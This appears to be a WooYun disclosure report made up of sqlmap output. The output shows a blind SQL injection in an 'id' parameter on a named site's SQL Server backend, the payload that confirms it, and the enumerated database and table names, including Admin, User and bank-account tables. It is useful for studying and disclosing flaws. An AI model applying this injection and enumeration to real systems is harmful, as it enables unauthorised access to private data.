WooYun.org

web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 9456=9456
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [11]:
[*] Dionly_CMS
[*] Dionly_CMS_CX
[*] Dionly_PAD
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] risun_DB_432
[*] tempdb
[*] YDX
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 9456=9456
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: Dionly_PAD
[45 tables]
+-------------------------+
| Address |
| Admin |
| Admin_Grant |
| Admin_IPRange |
| Admin_Log |
| Agent |
| Agent_Staff |
| Baike |
| Baike_Class |
| Base_Area |
| Base_BankAccount |
| Base_ColorJewel |
| Base_Gold |
| Base_IP |
| Base_Module |
| Base_Pearl |
| Base_Product_CustomType |
| Base_RingSizeRate |
| Base_TinyDiamond |
| Cart |
| Certify |
| Data |
| Diamond |
| Diamond_Temp |
| Diamond_W1 |
| Diamond_WG |
| Document |
| Favorite |
| Flow |
| GoToShop |
| Message |
| MobileProduct |
| News |
| News_Class |
| Order |
| Order_Diamond |
| Order_Fee |
| Order_Memo |
| Order_Product |
| Order_State |
| Parameter |
| Product |
| Recommend |
| User |
| User_ValidCode |
+-------------------------+
未脱裤,物管费已交..